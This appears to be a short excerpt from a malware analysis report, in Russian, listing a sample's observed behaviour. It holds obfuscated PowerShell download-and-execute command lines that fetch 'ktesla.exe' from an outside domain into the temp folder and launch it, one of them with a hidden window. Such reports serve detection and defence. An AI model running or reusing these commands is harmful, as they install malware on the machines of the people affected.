Техническая информация
- '<SYSTEM32>\cmd.exe' /c p^ower^she^ll -ex^ecutio^nPol^icy ByP^ass -NoP^rofile -com^mand (New-O^bject Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'mitonghot.top/teslap100d/','%TMP%\ktesla.exe');starT-Proc...
- DNS ASK mi###ghot.top
- '<SYSTEM32>\cmd.exe' /c p^ower^she^ll -ex^ecutio^nPol^icy ByP^ass -NoP^rofile -com^mand (New-O^bject Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'mitonghot.top/teslap100d/','%TMP%\ktesla.exe');starT-Proc...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionPolicy ByPass -NoProfile -command (New-Object Net.Webclient).('Downl'+'oadfile').invoke('ht'+'tp://'+'mitonghot.top/teslap100d/','%TEMP%\ktesla.exe');starT-Process '%TEMP%\ktesla.exe'...